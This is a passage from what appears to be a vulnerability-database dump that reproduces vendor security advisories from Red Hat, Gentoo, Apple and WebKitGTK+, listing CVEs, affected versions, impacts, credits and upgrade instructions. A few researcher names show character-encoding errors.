CVE-2020-14040 CVE-2020-14382 CVE-2020-14391 CVE-2020-14422 CVE-2020-15157 CVE-2020-15503 CVE-2020-15999 CVE-2020-24659 CVE-2020-24750 CVE-2020-25211 CVE-2020-25658 CVE-2021-3121 ==================================================================== 1. Summary: Red Hat OpenShift Container Platform release 4.7.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release also includes a security update for Red Hat OpenShift Container Platform 4.7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Description: Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Security Fix(es): * jackson-databind: Serialization gadgets in com.pastdev.httpcomponents.configuration.JndiConfiguration (CVE-2020-24750) * gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121) * golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.7.0. See the following advisory for the container images for this release: https://access.redhat.com/errata/RHEA-2020:5633 All OpenShift Container Platform users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -between-minor.html#understanding-upgrade-channels_updating-cluster-between - -minor. Solution: For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update: https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -cli.html. Bugs fixed (https://bugzilla.redhat.com/): 1823765 - nfd-workers crash under an ipv6 environment 1838802 - mysql8 connector from operatorhub does not work with metering operator 1838845 - Metering operator can't connect to postgres DB from Operator Hub 1841883 - namespace-persistentvolumeclaim-usage query returns unexpected values 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash 1868294 - NFD operator does not allow customisation of nfd-worker.conf 1882310 - CVE-2020-24750 jackson-databind: Serialization gadgets in com.pastdev.httpcomponents.configuration.JndiConfiguration 1890672 - NFD is missing a build flag to build correctly 1890741 - path to the CA trust bundle ConfigMap is broken in report operator 1897346 - NFD worker pods not scheduler on a 3 node master/worker cluster 1898373 - Metering operator failing upgrade from 4.4 to 4.6 channel 1900125 - FIPS error while generating RSA private key for CA 1906129 - OCP 4.7: Node Feature Discovery (NFD) Operator in CrashLoopBackOff when deployed from OperatorHub 1908492 - OCP 4.7: Node Feature Discovery (NFD) Operator Custom Resource Definition file in olm-catalog is not in sync with the one in manifests dir leading to failed deployment from OperatorHub 1913837 - The CI and ART 4.7 metering images are not mirrored 1914869 - OCP 4.7 NFD - Operand configuration options for NodeFeatureDiscovery are empty, no supported image for ppc64le 1916010 - olm skip range is set to the wrong range 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1923998 - NFD Operator is failing to update and remains in Replacing state 5. References: https://access.redhat.com/security/cve/CVE-2018-20843 https://access.redhat.com/security/cve/CVE-2019-3884 https://access.redhat.com/security/cve/CVE-2019-5018 https://access.redhat.com/security/cve/CVE-2019-8625 https://access.redhat.com/security/cve/CVE-2019-8710 https://access.redhat.com/security/cve/CVE-2019-8720 https://access.redhat.com/security/cve/CVE-2019-8743 https://access.redhat.com/security/cve/CVE-2019-8764 https://access.redhat.com/security/cve/CVE-2019-8766 https://access.redhat.com/security/cve/CVE-2019-8769 https://access.redhat.com/security/cve/CVE-2019-8771 https://access.redhat.com/security/cve/CVE-2019-8782 https://access.redhat.com/security/cve/CVE-2019-8783 https://access.redhat.com/security/cve/CVE-2019-8808 https://access.redhat.com/security/cve/CVE-2019-8811 https://access.redhat.com/security/cve/CVE-2019-8812 https://access.redhat.com/security/cve/CVE-2019-8813 https://access.redhat.com/security/cve/CVE-2019-8814 https://access.redhat.com/security/cve/CVE-2019-8815 https://access.redhat.com/security/cve/CVE-2019-8816 https://access.redhat.com/security/cve/CVE-2019-8819 https://access.redhat.com/security/cve/CVE-2019-8820 https://access.redhat.com/security/cve/CVE-2019-8823 https://access.redhat.com/security/cve/CVE-2019-8835 https://access.redhat.com/security/cve/CVE-2019-8844 https://access.redhat.com/security/cve/CVE-2019-8846 https://access.redhat.com/security/cve/CVE-2019-13050 https://access.redhat.com/security/cve/CVE-2019-13225 https://access.redhat.com/security/cve/CVE-2019-13627 https://access.redhat.com/security/cve/CVE-2019-14889 https://access.redhat.com/security/cve/CVE-2019-15165 https://access.redhat.com/security/cve/CVE-2019-15903 https://access.redhat.com/security/cve/CVE-2019-16168 https://access.redhat.com/security/cve/CVE-2019-16935 https://access.redhat.com/security/cve/CVE-2019-17450 https://access.redhat.com/security/cve/CVE-2019-17546 https://access.redhat.com/security/cve/CVE-2019-19221 https://access.redhat.com/security/cve/CVE-2019-19906 https://access.redhat.com/security/cve/CVE-2019-19956 https://access.redhat.com/security/cve/CVE-2019-20218 https://access.redhat.com/security/cve/CVE-2019-20387 https://access.redhat.com/security/cve/CVE-2019-20388 https://access.redhat.com/security/cve/CVE-2019-20454 https://access.redhat.com/security/cve/CVE-2019-20807 https://access.redhat.com/security/cve/CVE-2019-20907 https://access.redhat.com/security/cve/CVE-2019-20916 https://access.redhat.com/security/cve/CVE-2020-1730 https://access.redhat.com/security/cve/CVE-2020-1751 https://access.redhat.com/security/cve/CVE-2020-1752 https://access.redhat.com/security/cve/CVE-2020-1971 https://access.redhat.com/security/cve/CVE-2020-3862 https://access.redhat.com/security/cve/CVE-2020-3864 https://access.redhat.com/security/cve/CVE-2020-3865 https://access.redhat.com/security/cve/CVE-2020-3867 https://access.redhat.com/security/cve/CVE-2020-3868 https://access.redhat.com/security/cve/CVE-2020-3885 https://access.redhat.com/security/cve/CVE-2020-3894 https://access.redhat.com/security/cve/CVE-2020-3895 https://access.redhat.com/security/cve/CVE-2020-3897 https://access.redhat.com/security/cve/CVE-2020-3898 https://access.redhat.com/security/cve/CVE-2020-3899 https://access.redhat.com/security/cve/CVE-2020-3900 https://access.redhat.com/security/cve/CVE-2020-3901 https://access.redhat.com/security/cve/CVE-2020-3902 https://access.redhat.com/security/cve/CVE-2020-6405 https://access.redhat.com/security/cve/CVE-2020-7595 https://access.redhat.com/security/cve/CVE-2020-8492 https://access.redhat.com/security/cve/CVE-2020-8566 https://access.redhat.com/security/cve/CVE-2020-8619 https://access.redhat.com/security/cve/CVE-2020-8622 https://access.redhat.com/security/cve/CVE-2020-8623 https://access.redhat.com/security/cve/CVE-2020-8624 https://access.redhat.com/security/cve/CVE-2020-9327 https://access.redhat.com/security/cve/CVE-2020-9802 https://access.redhat.com/security/cve/CVE-2020-9803 https://access.redhat.com/security/cve/CVE-2020-9805 https://access.redhat.com/security/cve/CVE-2020-9806 https://access.redhat.com/security/cve/CVE-2020-9807 https://access.redhat.com/security/cve/CVE-2020-9843 https://access.redhat.com/security/cve/CVE-2020-9850 https://access.redhat.com/security/cve/CVE-2020-9862 https://access.redhat.com/security/cve/CVE-2020-9893 https://access.redhat.com/security/cve/CVE-2020-9894 https://access.redhat.com/security/cve/CVE-2020-9895 https://access.redhat.com/security/cve/CVE-2020-9915 https://access.redhat.com/security/cve/CVE-2020-9925 https://access.redhat.com/security/cve/CVE-2020-10018 https://access.redhat.com/security/cve/CVE-2020-10029 https://access.redhat.com/security/cve/CVE-2020-11793 https://access.redhat.com/security/cve/CVE-2020-13630 https://access.redhat.com/security/cve/CVE-2020-13631 https://access.redhat.com/security/cve/CVE-2020-13632 https://access.redhat.com/security/cve/CVE-2020-14040 https://access.redhat.com/security/cve/CVE-2020-14382 https://access.redhat.com/security/cve/CVE-2020-14391 https://access.redhat.com/security/cve/CVE-2020-14422 https://access.redhat.com/security/cve/CVE-2020-15157 https://access.redhat.com/security/cve/CVE-2020-15503 https://access.redhat.com/security/cve/CVE-2020-15999 https://access.redhat.com/security/cve/CVE-2020-24659 https://access.redhat.com/security/cve/CVE-2020-24750 https://access.redhat.com/security/cve/CVE-2020-25211 https://access.redhat.com/security/cve/CVE-2020-25658 https://access.redhat.com/security/cve/CVE-2021-3121 https://access.redhat.com/security/updates/classification/#moderate 6. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2021 Red Hat, Inc
var-201904-1414 Multiple memory corruption issues were addressed with improved memory handling. This issue affected versions prior to iOS 12, tvOS 12, Safari 12, iTunes 12.9 for Windows, iCloud for Windows 7.7. Apple Has released an update for each product.The expected impact depends on each vulnerability, but can be affected as follows: * Service operation interruption (DoS) * Arbitrary code execution * Script execution * information leak * Access restriction avoidance. Apple Safari, etc. are all products of Apple (Apple). Apple Safari is a web browser that is the default browser included with the Mac OS X and iOS operating systems. Apple iOS is an operating system developed for mobile devices. Apple tvOS is a smart TV operating system. WebKit is one of the web browser engine components. A buffer error vulnerability exists in the WebKit component of several Apple products. CVE-2018-4407: Kevin Backhouse of Semmle Ltd. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201812-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: WebkitGTK+: Multiple vulnerabilities Date: December 02, 2018 Bugs: #667892 ID: 201812-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in WebKitGTK+, the worst of which may lead to arbitrary code execution. Background ========== WebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-libs/webkit-gtk < 2.22.0 >= 2.22.0 Description =========== Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details. Workaround ========== There is no known workaround at this time. Resolution ========== All WebkitGTK+ users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.22.0" References ========== [ 1 ] CVE-2018-4191 https://nvd.nist.gov/vuln/detail/CVE-2018-4191 [ 2 ] CVE-2018-4197 https://nvd.nist.gov/vuln/detail/CVE-2018-4197 [ 3 ] CVE-2018-4207 https://nvd.nist.gov/vuln/detail/CVE-2018-4207 [ 4 ] CVE-2018-4208 https://nvd.nist.gov/vuln/detail/CVE-2018-4208 [ 5 ] CVE-2018-4209 https://nvd.nist.gov/vuln/detail/CVE-2018-4209 [ 6 ] CVE-2018-4210 https://nvd.nist.gov/vuln/detail/CVE-2018-4210 [ 7 ] CVE-2018-4212 https://nvd.nist.gov/vuln/detail/CVE-2018-4212 [ 8 ] CVE-2018-4213 https://nvd.nist.gov/vuln/detail/CVE-2018-4213 [ 9 ] CVE-2018-4299 https://nvd.nist.gov/vuln/detail/CVE-2018-4299 [ 10 ] CVE-2018-4306 https://nvd.nist.gov/vuln/detail/CVE-2018-4306 [ 11 ] CVE-2018-4309 https://nvd.nist.gov/vuln/detail/CVE-2018-4309 [ 12 ] CVE-2018-4311 https://nvd.nist.gov/vuln/detail/CVE-2018-4311 [ 13 ] CVE-2018-4312 https://nvd.nist.gov/vuln/detail/CVE-2018-4312 [ 14 ] CVE-2018-4314 https://nvd.nist.gov/vuln/detail/CVE-2018-4314 [ 15 ] CVE-2018-4315 https://nvd.nist.gov/vuln/detail/CVE-2018-4315 [ 16 ] CVE-2018-4316 https://nvd.nist.gov/vuln/detail/CVE-2018-4316 [ 17 ] CVE-2018-4317 https://nvd.nist.gov/vuln/detail/CVE-2018-4317 [ 18 ] CVE-2018-4318 https://nvd.nist.gov/vuln/detail/CVE-2018-4318 [ 19 ] CVE-2018-4319 https://nvd.nist.gov/vuln/detail/CVE-2018-4319 [ 20 ] CVE-2018-4323 https://nvd.nist.gov/vuln/detail/CVE-2018-4323 [ 21 ] CVE-2018-4328 https://nvd.nist.gov/vuln/detail/CVE-2018-4328 [ 22 ] CVE-2018-4358 https://nvd.nist.gov/vuln/detail/CVE-2018-4358 [ 23 ] CVE-2018-4359 https://nvd.nist.gov/vuln/detail/CVE-2018-4359 [ 24 ] CVE-2018-4361 https://nvd.nist.gov/vuln/detail/CVE-2018-4361 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201812-04 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. License ======= Copyright 2018 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. https://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2018-9-24-4 Additional information for APPLE-SA-2018-9-17-1 iOS 12 iOS 12 addresses the following: Accounts Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local app may be able to read a persistent account identifier Description: This issue was addressed with improved entitlements. CVE-2018-4322: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc. Auto Unlock Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to access local users AppleIDs Description: A validation issue existed in the entitlement verification. CVE-2018-4321: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc. Entry added September 24, 2018 Bluetooth Available for: iPhone SE, iPhone 6s, iPhone 6s Plus, iPhone 7, iPhone 7 Plus, iPad Mini 4, 12.9-inch iPad Pro 1st generation, 12.9-inch iPad Pro 2nd generation, 10.5-inch iPad Pro, 9.7-inch iPad Pro, iPad 5th generation, and iPod Touch 6th generation Impact: An attacker in a privileged network position may be able to intercept Bluetooth traffic Description: An input validation issue existed in Bluetooth. CVE-2018-5383: Lior Neumann and Eli Biham CoreMedia Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An app may be able to learn information about the current camera view before being granted camera access Description: A permissions issue existed. CVE-2018-4356: an anonymous researcher Crash Reporter Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2018-4333: Brandon Azad Entry added September 24, 2018 IOMobileFrameBuffer Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2018-4335: Brandon Azad iTunes Store Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An attacker in a privileged network position may be able to spoof password prompts in the iTunes Store Description: An input validation issue was addressed with improved input validation. CVE-2018-4305: Jerry Decime Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to read restricted memory Description: An input validation issue existed in the kernel. CVE-2018-4363: Ian Beer of Google Project Zero Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4336: Brandon Azad CVE-2018-4344: The UK's National Cyber Security Centre (NCSC) Entry added September 24, 2018 Messages Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to discover a user's deleted messages Description: A consistency issue existed in the handling of application snapshots. CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi - Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l University, Metin Altug Karakaya of Kaliptus Medical Organization, Vinodh Swami of Western Governor's University (WGU) Notes Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to discover a user's deleted notes Description: A consistency issue existed in the handling of application snapshots. CVE-2018-4352: an anonymous researcher Safari Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to discover websites a user has visited Description: A consistency issue existed in the handling of application snapshots. CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi - Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l University, Metin Altug Karakaya of Kaliptus Medical Organization, Vinodh Swami of Western Governor's University (WGU) Safari Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A user may be unable to delete browsing history items Description: Clearing a history item may not clear visits with redirect chains. CVE-2018-4329: Hugo S. Diaz (coldpointblue) SafariViewController Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Visiting a malicious website may lead to address bar spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2018-4362: Jun Kokatsu (@shhnjk) Security Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious website may be able to exfiltrate autofilled data in Safari Description: A logic issue was addressed with improved state management. CVE-2018-4307: Rafay Baloch of Pakistan Telecommunications Authority Security Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An attacker may be able to exploit weaknesses in the RC4 cryptographic algorithm Description: This issue was addressed by removing RC4. CVE-2016-1777: Pepi Zawodsky Status Bar Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A person with physical access to an iOS device may be able to determine the last used app from the lock screen Description: A logic issue was addressed with improved restrictions. CVE-2018-4325: Brian Adeloye WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2018-4316: crixer, Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan Team Entry added September 24, 2018 WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4319: John Pettitt of Google Entry added September 24, 2018 WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2018-4345: an anonymous researcher Entry added September 24, 2018 WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Unexpected interaction causes an ASSERT failure Description: A memory corruption issue was addressed with improved validation. CVE-2018-4191: found by OSS-Fuzz Entry added September 24, 2018 WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Cross-origin SecurityErrors includes the accessed frame's origin Description: The issue was addressed by removing origin information. CVE-2018-4311: Erling Alf Ellingsen (@steike) Entry added September 24, 2018 WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious website may be able to execute scripts in the context of another website Description: A cross-site scripting issue existed in Safari. CVE-2018-4309: an anonymous researcher working with Trend Micro's Zero Day Initiative Entry added September 24, 2018 WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Unexpected interaction causes an ASSERT failure Description: A memory consumption issue was addressed with improved memory handling. CVE-2018-4361: found by Google OSS-Fuzz Entry added September 24, 2018 Wi-Fi Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. configd We would like to acknowledge Sabri Haddouche (@pwnsdx) of Wire Swiss GmbH for their assistance. Core Data We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security Labs GmbH for their assistance. Exchange ActiveSync We would like to acknowledge Jesse Thompson of University of Wisconsin-Madison for their assistance. Mail We would like to acknowledge Alessandro Avagliano of Rocket Internet SE, Gunnar Diepenbruck, and Zbyszek A>>A3Akiewski for their assistance. MediaRemote We would like to acknowledge Brandon Azad for their assistance. Safari We would like to acknowledge Marcel Manz of SIMM-Comm GmbH and Vlad Galbin for their assistance. Security We would like to acknowledge Christoph Sinai, Daniel Dudek (@dannysapples) of The Irish Times and Filip KlubiAka (@lemoncloak) of ADAPT Centre, Dublin Institute of Technology, Istvan Csanady of Shapr3D, Omar Barkawi of ITG Software, Inc., Phil Caleno, Wilson Ding, and an anonymous researcher for their assistance. SQLite We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security Labs GmbH for their assistance. Status Bar We would like to acknowledge Ju Zhu of Meituan and Moony Li and Lilang Wu of Trend Micro for their assistance. WebKit We would like to acknowledge Cary Hartline, Hanming Zhang from 360 Vuclan team, Tencent Keen Security Lab working with Trend Micro's Zero Day Initiative, and Zach Malone of CA Technologies for their assistance. Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "iOS 12". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlupFUMACgkQeC9tht7T K3Gpbg/9HBJDw9agGt5ZwLBzc5njAETI5Hxk0LDn5PjvmXpxD0kB/GcuH5vODNfi TOUNox5KfIIaD0HB1qo5zq4zdh1VmnCNKALJK0wY0U3KaACRghu0xTjpbXsYcYQy 4aGdt+UuiPBqsMkSUrakba1JHcYWrpc4GfUaxIUZw+aFdA0G2oUOYAN5w3a3I01A aVY1Qzq93MdUCjdr3ASXn4gdMtZeYAze4dXCkmvOXS8CPG4xok2C/MdwaTRKh1ex S74YkM+Oz+mAG+3uebwexeHWLUbFHKBr4KXu2DFvpJ4JxNu57SOqwEDDfauVOCHb 13YFf+i+Zh5g9SODQJFXDXk6Cl6MlTuEsLcr1YX8xqmSLilaFJTiz7nxxAG0Qctb Z80wHbzQeGaGQwEy1A99X7X33PupzyaJFiK/4F8O5neo18LliunU01Tzk16sgYFt 4Jg/e5+EkcGf1TJiCTMzIPDVsMBDRcTV9KMBUjr+LmbBJ5T8XKdg5nuEURKT3QFQ h05+La/AFn+sJ8FFTK0WQmvM96vKQELyBBC9Npa7n1riCPHldPt9+vQ3wVwo5MD4 SdGfACevV+Qf8G1A064fM74nrJOnoqLowQiCtMSOpMx3PWwX0Pzw2SVyaFG3cLAv 221+OCYYcniG7UPdjoFv7kObGFEUC9vt1TS76VfolzKWd/fcakg= =JOUe -----END PGP SIGNATURE----- . Installation note: Safari 12 may be obtained from the Mac App Store. ----------------------------------------------------------------------- WebKitGTK+ and WPE WebKit Security Advisory WSA-2018-0007 ------------------------------------------------------------------------ Date reported : September 26, 2018 Advisory ID : WSA-2018-0007 WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2018-0007.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2018-0007.html CVE identifiers : CVE-2018-4207, CVE-2018-4208, CVE-2018-4209, CVE-2018-4210, CVE-2018-4212, CVE-2018-4213, CVE-2018-4191, CVE-2018-4197, CVE-2018-4299, CVE-2018-4306, CVE-2018-4309, CVE-2018-4311, CVE-2018-4312, CVE-2018-4314, CVE-2018-4315, CVE-2018-4316, CVE-2018-4317, CVE-2018-4318, CVE-2018-4319, CVE-2018-4323, CVE-2018-4328, CVE-2018-4358, CVE-2018-4359, CVE-2018-4361. Several vulnerabilities were discovered in WebKitGTK+ and WPE WebKit. CVE-2018-4207 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. This issue was addressed with improved checks. CVE-2018-4208 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. This issue was addressed with improved checks. CVE-2018-4209 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. This issue was addressed with improved checks. CVE-2018-4210 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction with indexing types caused a failure. An array indexing issue existed in the handling of a function in JavaScriptCore. This issue was addressed with improved checks. CVE-2018-4212 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. This issue was addressed with improved checks. CVE-2018-4213 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. This issue was addressed with improved checks. CVE-2018-4191 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4197 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4299 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Samuel GroI2 (saelo) working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4306 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4309 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to an anonymous researcher working with Trend Micro's Zero Day Initiative. A malicious website may be able to execute scripts in the context of another website. A cross-site scripting issue existed in WebKit. This issue was addressed with improved URL validation. CVE-2018-4311 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Erling Alf Ellingsen (@steike). Cross-origin SecurityErrors includes the accessed frameas origin. The issue was addressed by removing origin information. CVE-2018-4312 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4314 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4315 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4316 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to crixer, Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan Team. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4317 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4318 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4319 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to John Pettitt of Google. A malicious website may cause unexepected cross-origin behavior. A cross-origin issue existed with iframe elements. This was addressed with improved tracking of security origins. CVE-2018-4323 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4328 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4358 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to @phoenhex team (@bkth_ @5aelo @_niklasb) working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4359 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Samuel GroA (@5aelo). Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4361 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. We recommend updating to the latest stable versions of WebKitGTK+ and WPE WebKit. It is the best way to ensure that you are running safe versions of WebKit. Please check our websites for information about the latest stable releases. Further information about WebKitGTK+ and WPE WebKit security advisories can be found at: https://webkitgtk.org/security.html or https://wpewebkit.org/security/. The WebKitGTK+ and WPE WebKit team, September 26, 2018
var-202205-1299 A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5, watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted web content may lead to code execution. Apple tvOS is a smart TV operating system developed by Apple (Apple). tvOS 15.0 19J346 - 15.4.1 19L452 versions have a buffer error vulnerability caused by a boundary error when processing HTML content in WebKit. A remote attacker could exploit this vulnerability to execute arbitrary code on the target system. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2022-05-16-7 Safari 15.5 Safari 15.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213260. WebKit Bugzilla: 236950 CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab WebKit Bugzilla: 238171 CVE-2022-26717: Jeonghoon Shin of Theori WebKit Available for: macOS Big Sur and macOS Catalina Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. WebKit Bugzilla: 238183 